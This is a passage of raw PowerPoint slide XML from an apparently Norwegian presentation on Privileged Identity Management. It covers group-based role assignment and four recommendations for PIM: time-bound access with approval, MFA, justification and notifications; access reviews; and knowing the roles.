            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Simpler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>administer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial,Sans-Serif" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>applied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>approval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>workflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1400" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bilde 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5368A78A-222C-1613-D81B-BC01B21897CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5299789" y="3530176"/>
            <a:ext cx="4553338" cy="2677643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="619439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4BC0-BB0F-8A27-394B-85D3B888F4E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Privileged Identity Management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Four recommendations when using PIM</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B433CA6-5B15-467F-A625-A7B8424C7209}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663049" y="2011680"/>
            <a:ext cx="5691098" cy="3766185"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>feature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" b="1" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Time-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>bound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Require</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>approval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> gates, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Enforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>MFA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>activate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>require</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>justification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>notifications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Conduct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>reviews</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" b="1" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Review</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>regularily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>revoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4572" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>know</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Identify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> have most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>meaning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>educate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
